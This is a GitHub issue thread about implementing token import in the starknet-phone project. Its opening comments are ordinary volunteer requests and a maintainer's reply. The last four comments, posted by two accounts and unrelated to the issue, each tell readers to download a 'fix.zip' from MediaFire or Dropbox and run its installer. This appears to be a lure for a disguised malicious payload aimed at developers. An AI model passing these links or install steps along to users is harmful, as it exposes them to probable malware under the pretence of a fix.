### ISSUE TITLE
token import implementation

### ISSUE THREAD

**Issue by trbutler4** [keep-starknet-strange/starknet-phone#62]

**Comment by Iwueseiter** [comment]
Can I work on this?

**Comment by trbutler4** [comment]
> Can I work on this?

this issue was already assigned as i created it over telegram, can you join there to participate in the discussion? https://t.me/+8G3EBNnfyS1lNzYx

**Comment by Iwueseiter** [comment]
Alright

**Comment by Iwueseiter** [comment]
Alright

**Comment by lauchaves** [comment]
Hey @trbutler4 may I work on this one!

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
